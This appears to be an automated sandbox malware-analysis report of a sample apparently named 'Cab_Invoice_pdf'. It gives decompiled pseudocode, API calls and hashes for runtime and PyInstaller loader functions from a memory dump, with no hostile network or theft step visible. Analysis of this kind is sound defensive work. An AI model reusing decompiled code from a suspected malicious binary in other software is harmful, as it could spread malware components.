								goto L20;
							}
							_t28 = SetEndOfFile(E0131E926(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E0131C9CE())) = 0xd;
							_t30 = E0131C9BB();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E01320B10(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E0131D960(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E0132308B(_t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0131C9BB();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E0131C9CE())) = 0xd;
										}
										L23:
										_t38 = E0131C9CE();
										E013209EB(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E0131D960(_t56, _t59, _v12);
							E013209EB(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E0131C9CE())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E0131C9CE()));
			}





























                            0x0132ce51
                            0x0132ce5b
                            0x0132ce5e
                            0x0132ce65
                            0x0132ce6c
                            0x0132ce71
                            0x0132ce74
                            0x0132ce7a
                            0x0132ce8d
                            0x0132ce94
                            0x0132ce97
                            0x0132ce99
                            0x0132ce9c
                            0x00000000
                            0x00000000
                            0x0132cea2
                            0x0132cea2
                            0x0132cea4
                            0x0132cea7
                            0x0132cea9
                            0x0132ceac
                            0x0132cf8a
                            0x0132cf8a
                            0x0132cf8c
                            0x0132cf43
                            0x0132cf4b
                            0x0132cf55
                            0x0132cf58
                            0x0132cfd9
                            0x0132cfd9
                            0x0132cfdb
                            0x00000000
                            0x0132cfdb
                            0x0132cf5a
                            0x0132cf5f
                            0x00000000
                            0x0132cf5f
                            0x0132cf8e
                            0x0132cf94
                            0x0132cf9c
                            0x0132cfa3
                            0x0132cfa6
                            0x0132cfa9
                            0x00000000
                            0x00000000
                            0x0132cfb3
                            0x0132cfb9
                            0x0132cfbb
                            0x00000000
                            0x00000000
                            0x0132cfc2
                            0x0132cfc8
                            0x0132cfd5
                            0x00000000
                            0x0132cfd5
                            0x0132cf90
                            0x0132cf92
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132cf92
                            0x0132ceb2
                            0x0132cebc
                            0x0132cec8
                            0x0132cecb
                            0x0132cecc
                            0x0132cece
                            0x0132ceec
                            0x0132ceef
                            0x0132cef2
                            0x0132cef3
                            0x0132cef3
                            0x0132cef5
                            0x0132cf08
                            0x0132cf08
                            0x0132cf0a
                            0x0132cf0d
                            0x0132cf12
                            0x0132cf15
                            0x0132cf18
                            0x0132cf63
                            0x0132cf68
                            0x0132cf6b
                            0x0132cf72
                            0x0132cf72
                            0x0132cf78
                            0x0132cf78
                            0x0132cf80
                            0x0132cf86
                            0x00000000
                            0x0132cf86
                            0x0132cf1a
                            0x0132cf1b
                            0x0132cf1d
                            0x0132cf20
                            0x0132cf22
                            0x0132cf25
                            0x0132cf27
                            0x0132cf01
                            0x0132cf01
                            0x00000000
                            0x0132cf01
                            0x0132cf29
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132cf29
                            0x0132cef7
                            0x00000000
                            0x00000000
                            0x0132cef9
                            0x0132ceff
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132cf2b
                            0x0132cf2b
                            0x0132cf2b
                            0x0132cf33
                            0x0132cf39
                            0x0132cf3e
                            0x0132cf41
                            0x0132cf41
                            0x00000000
                            0x0132cf41
                            0x0132ced5
                            0x00000000
                            0x0132ced5
                            0x0132ceb4
                            0x0132ceb6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132ceb6
                            0x0132ce7c
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: ada248b5bd3347f43ec1d24ef7e4408541db6ff9a9345d998ff26c9ede1c8b05
                            • Instruction ID: 6a8371eefd091abc7d88622678c3f8378c6bd9c98afdf8dbe5d8316ba38fca1b
                            • Opcode Fuzzy Hash: ada248b5bd3347f43ec1d24ef7e4408541db6ff9a9345d998ff26c9ede1c8b05
                            • Instruction Fuzzy Hash: 1F414832A402367BDB357BBC8C80EBE3EA9EF1267CF141215F51DD6194D674894983A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328041, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E01328041(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x133c008; // 0xa3433343
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E0131AFAE(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E0131786A();
					return _t67;
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E01318520(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E0132815E(_t71);
					goto L15;
				}
				asm("sbb eax, eax");
				_t47 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E01320A25(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E0132F250();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                            0x01328049
                            0x01328050
                            0x01328053
                            0x0132805c
                            0x01328061
                            0x01328066
                            0x0132806b
                            0x0132806e
                            0x01328070
                            0x01328070
                            0x01328075
                            0x0132808e
                            0x01328094
                            0x01328099
                            0x01328138
                            0x0132813c
                            0x01328141
                            0x01328141
                            0x01328155
                            0x0132815d
                            0x0132815d
                            0x0132809f
                            0x013280a7
                            0x013280ab
                            0x013280f7
                            0x013280f9
                            0x013280fb
                            0x01328100
                            0x01328117
                            0x0132811f
                            0x0132812f
                            0x0132812f
                            0x0132811f
                            0x01328131
                            0x01328132
                            0x00000000
                            0x01328137
                            0x013280b2
                            0x013280b4
                            0x013280b6
                            0x013280be
                            0x013280db
                            0x013280e5
                            0x013280ea
                            0x00000000
                            0x00000000
                            0x013280ec
                            0x013280f2
                            0x013280f2
                            0x00000000
                            0x013280f2
                            0x013280c2
                            0x013280c6
                            0x013280cb
                            0x013280cf
                            0x00000000
                            0x00000000
                            0x013280d1
                            0x00000000

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,01323E2E,?,00000000,?,00000001,?,?,00000001,01323E2E,?), ref: 0132808E
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 01328117
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01320C3C,?), ref: 01328129
                            • __freea.LIBCMT ref: 01328132
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: 5619dc2d115a0b4fba2053589bf067afb5d288396e2f1f6a5e46f15faa98a723
                            • Instruction ID: c38cdc15ecfb4a93aad769d38e4fda7e8979d4cc34cff848d020fe9e9ec58fd9
                            • Opcode Fuzzy Hash: 5619dc2d115a0b4fba2053589bf067afb5d288396e2f1f6a5e46f15faa98a723
                            • Instruction Fuzzy Hash: 9B31D472A0022AABDF25AF68DC40DAF7BE5EF50714F1441A8FC04D7194EB35D951CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131CDB3, Relevance: 6.1, APIs: 4, Instructions: 65timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0131CDB3(struct _FILETIME _a4, intOrPtr _a8, signed int _a12, void* _a16) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				signed int _v44;
				signed int _t20;
				signed int _t26;
				signed int _t27;
				signed int _t43;
				signed int _t46;

				_t20 =  *0x133c008; // 0xa3433343
				_v8 = _t20 ^ _t46;
				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
					if(FileTimeToSystemTime( &_a4,  &_v40) == 0 || SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24) == 0) {
						_t26 = E0131C998(GetLastError());
						goto L8;
					} else {
						_v44 = _v44 | 0xffffffff;
						_t27 = E0131CE5D( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44);
						if((_t27 & _t43) == 0xffffffff) {
							_t26 = E0131C9CE();
							 *_t26 = 0x84;
							L8:
							_t27 = _t26 | 0xffffffff;
						}
					}
				} else {
					_t27 = _a12;
				}
				E0131786A();
				return _t27;
			}












                            0x0131cdbb
                            0x0131cdc2
                            0x0131cdc9
                            0x0131cde9
                            0x0131ce44
                            0x00000000
                            0x0131cdff
                            0x0131cdff
                            0x0131ce1f
                            0x0131ce2e
                            0x0131ce30
                            0x0131ce35
                            0x0131ce4a
                            0x0131ce4a
                            0x0131ce4d
                            0x0131ce2e
                            0x0131cdd1
                            0x0131cdd1
                            0x0131cdd4
                            0x0131ce54
                            0x0131ce5c

                            APIs
                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,00000000,00000000,000000FF,?,?,00000000), ref: 0131CDE1
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0131CDF5
                            • GetLastError.KERNEL32 ref: 0131CE3D
                            • __dosmaperr.LIBCMT ref: 0131CE44
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                            • String ID:
                            • API String ID: 593088924-0
                            • Opcode ID: 511e000e6fbd5f157d91cd7f22f46a7e415887e7b6224e67bb69092562aa3f6b
                            • Instruction ID: e724454b2b17529ab85fe9cd1449cf305dec49364d4b75a11f38b9fb4f15c06e
                            • Opcode Fuzzy Hash: 511e000e6fbd5f157d91cd7f22f46a7e415887e7b6224e67bb69092562aa3f6b
                            • Instruction Fuzzy Hash: DE21607294010DABCB18DFE4C944AEEBBBCAF08325F106256E516D6084EB34D744CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131FD60, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E0131FD60(signed int __eax, void* __ecx, void* __edx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				void* _t16;
				short** _t17;
				char* _t20;
				void* _t21;

				_t16 = __edx;
				_t13 = __ecx;
				_t17 =  *0x13460c0; // 0x1084680
				if(_t17 != 0) {
					_t10 = 0;
					while( *_t17 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t17, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t20 = E01320B10(_t13, _t11, 1);
							_pop(_t13);
							if(_t20 == 0) {
								L10:
								_t2 = E013209EB(_t20);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t17, 0xffffffff, _t20, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t20);
									E01326882(_t16);
									E013209EB(0);
									_t21 = _t21 + 0xc;
									_t17 =  &(_t17[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}












                            0x0131fd60
                            0x0131fd60
                            0x0131fd63
                            0x0131fd6b
                            0x0131fd74
                            0x0131fdc9
                            0x0131fd82
                            0x0131fd88
                            0x0131fd8c
                            0x0131fdda
                            0x0131fdda
                            0x0131fd8e
                            0x0131fd96
                            0x0131fd99
                            0x0131fd9c
                            0x0131fdd3
                            0x0131fdd4
                            0x00000000
                            0x0131fd9e
                            0x0131fda8
                            0x0131fdb4
                            0x00000000
                            0x0131fdb6
                            0x0131fdb6
                            0x0131fdb7
                            0x0131fdb8
                            0x0131fdbe
                            0x0131fdc3
                            0x0131fdc6
                            0x00000000
                            0x0131fdc6
                            0x0131fdb4
                            0x0131fd9c
                            0x0131fdcf
                            0x0131fdd2
                            0x00000000
                            0x0131fdd2
                            0x0131fdcd
                            0x00000000
                            0x0131fd6d
                            0x0131fd71
                            0x0131fd71
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd53034e76b2a648866ea272b7578883af12e3d605f57a1a7a613d311cc00bd6
                            • Instruction ID: 687964b47140dbb8d0ad98b8a684c8998c20f3c25440ae0a7b990c3e9fbdf379
                            • Opcode Fuzzy Hash: dd53034e76b2a648866ea272b7578883af12e3d605f57a1a7a613d311cc00bd6
                            • Instruction Fuzzy Hash: A8014FB220962A7EF629297C6CC1F7B665DDF517BCF600326F632551DDDA608D0841A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131FDDF, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E0131FDDF(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x13460bc; // 0x0
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E01320B10(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E013209EB(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0132688D(_t13);
									E013209EB(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                            0x0131fddf
                            0x0131fde2
                            0x0131fdea
                            0x0131fdf3
                            0x0131fe42
                            0x0131fdff
                            0x0131fe05
                            0x0131fe09
                            0x0131fe53
                            0x0131fe53
                            0x0131fe0b
                            0x0131fe13
                            0x0131fe16
                            0x0131fe19
                            0x0131fe4c
                            0x0131fe4d
                            0x00000000
                            0x0131fe1b
                            0x0131fe21
                            0x0131fe2d
                            0x00000000
                            0x0131fe2f
                            0x0131fe2f
                            0x0131fe30
                            0x0131fe31
                            0x0131fe37
                            0x0131fe3c
                            0x0131fe3f
                            0x00000000
                            0x0131fe3f
                            0x0131fe2d
                            0x0131fe19
                            0x0131fe48
                            0x0131fe4b
                            0x00000000
                            0x0131fe4b
                            0x0131fe46
                            0x00000000
                            0x0131fdec
                            0x0131fdf0
                            0x0131fdf0
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c5895b54a2633f70700ae944cd9cc038f738bc86bbd98df5584e3eb105e93e1
                            • Instruction ID: 6dea6ab17226b7dec6e8d329d7886201be7d06ebaf11757e0bf61ded4461cdcb
                            • Opcode Fuzzy Hash: 0c5895b54a2633f70700ae944cd9cc038f738bc86bbd98df5584e3eb105e93e1
                            • Instruction Fuzzy Hash: 4901D1B2209A2A7EF629297C6CC0D6B6A5DEF41BBCB200329F535921DADB608C084170
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01323623, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E01323623(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x1346318 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x13352d0 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xa3433344
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                            0x01323628
                            0x0132362c
                            0x01323633
                            0x01323637
                            0x01323645
                            0x0132365b
                            0x0132365f
                            0x01323688
                            0x0132368a
                            0x0132368e
                            0x01323691
                            0x01323691
                            0x01323697
                            0x01323699
                            0x00000000
                            0x0132369a
                            0x01323661
                            0x0132366a
                            0x01323679
                            0x0132366c
                            0x0132366f
                            0x01323675
                            0x01323675
                            0x0132367d
                            0x00000000
                            0x0132367f
                            0x01323682
                            0x01323684
                            0x00000000
                            0x01323684
                            0x0132367d
                            0x01323639
                            0x0132363e
                            0x00000000

                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0131A8EB,00000000,00000000,?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue), ref: 01323655
                            • GetLastError.KERNEL32(?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue,013357B4,013357BC,00000000,00000364,?,013244F7), ref: 01323661
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,013235CA,0131A8EB,00000000,00000000,00000000,?,01323889,00000006,FlsSetValue,013357B4,013357BC,00000000), ref: 0132366F
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: bad26df613f07dd005085c16599c29d2a0f759aa768d02eeb89bdd357df91d79
                            • Instruction ID: ef0cb0fa4b0668c1ccd00ca3549c129f1052f6e498986ee5c99aec6eca9fa040
                            • Opcode Fuzzy Hash: bad26df613f07dd005085c16599c29d2a0f759aa768d02eeb89bdd357df91d79
                            • Instruction Fuzzy Hash: 3D01D432601236ABC731596CACC4A5ABB9CFB09B75F110620F919D3240D738D8048BE8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013190D6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E013190D6() {
				void* _t4;
				void* _t8;

				E013195F4();
				E01319588();
				if(E013192E8() != 0) {
					_t4 = E0131929A(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E01319324();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                            0x013190d6
                            0x013190db
                            0x013190e7
                            0x013190ec
                            0x013190f1
                            0x013190f3
                            0x013190fe
                            0x013190f5
                            0x013190f5
                            0x00000000
                            0x013190f5
                            0x013190e9
                            0x013190e9
                            0x013190eb
                            0x013190eb

                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 013190D6
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 013190DB
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 013190E0
                              • Part of subcall function 013192E8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 013192F9
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 013190F5
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction ID: f1ae8affaf00e4f12c2a455dbc1020fa86d0da459a9f17d5c8056f63a281f38a
                            • Opcode Fuzzy Hash: e28c8e4002e4feb3b2185dbbe633f88e05227d084f504df5a77bd89c2bb576a4
                            • Instruction Fuzzy Hash: 8CC0486440032BD8DD2D3ABD22B53ED23880EBB98DBC0A8C1C8A02B44E8D07006B5333
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01312450, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 207COMMON
                            Download Yara Rule
                            C-Code - Quality: 40%
                            			E01312450(void* __edx, void* __eflags, char _a4092, char _a4096, char _a8192, signed int _a12284, signed int _a12288, intOrPtr _a12292, intOrPtr _a12296, intOrPtr _a12300) {
				char _v0;
				char _v4;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t35;
				signed int _t39;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				signed int _t60;
				signed int _t63;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				void* _t76;
				signed int _t77;
				void* _t79;
				signed int _t85;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				intOrPtr _t98;
				signed int _t101;
				intOrPtr* _t102;
				intOrPtr _t104;
				signed int _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t115;
				void* _t117;
				void* _t120;

				_t120 = __eflags;
				_t90 = __edx;
				E01317880();
				_t35 =  *0x133c008; // 0xa3433343
				_a12288 = _t35 ^ _t108;
				_t104 = _a12300;
				E0131D2BE(E0131A7EB(2), 0);
				_push(0);
				_t39 = E01311770(_t120);
				_t93 = _t39;
				_t110 = _t108 + 0x10;
				if(_t93 != 0) {
					_t39 = E013127A0(__edx,  &_v0, _v0);
					_t110 = _t110 + 8;
					__eflags = _t39;
					if(_t39 == 0) {
						goto L1;
					} else {
						_t39 = E013126F0( &_a8192,  &_v0);
						_t110 = _t110 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t39 = L01312930(__eflags,  &_a4096,  &_v0);
							_t110 = _t110 + 8;
							__eflags = _t39;
							if(_t39 == 0) {
								goto L1;
							} else {
								_push(_t76);
								_push("_MEIPASS2");
								_t77 = E01313E40(_t76, _t93);
								E013143D0("_MEIPASS2");
								_t49 = E01311690(_t104, _t93,  &_v0);
								_t112 = _t110 + 0x10;
								__eflags = _t49;
								if(_t49 != 0) {
									L8:
									 *((intOrPtr*)(_t93 + 0x4074)) = _t104;
									_t98 = _a12296;
									 *((intOrPtr*)(_t93 + 0x4070)) = _t98;
									__eflags = _t77;
									if(_t77 != 0) {
										L11:
										__imp__SetDllDirectoryW(E01314BF0(0, _t77, 0));
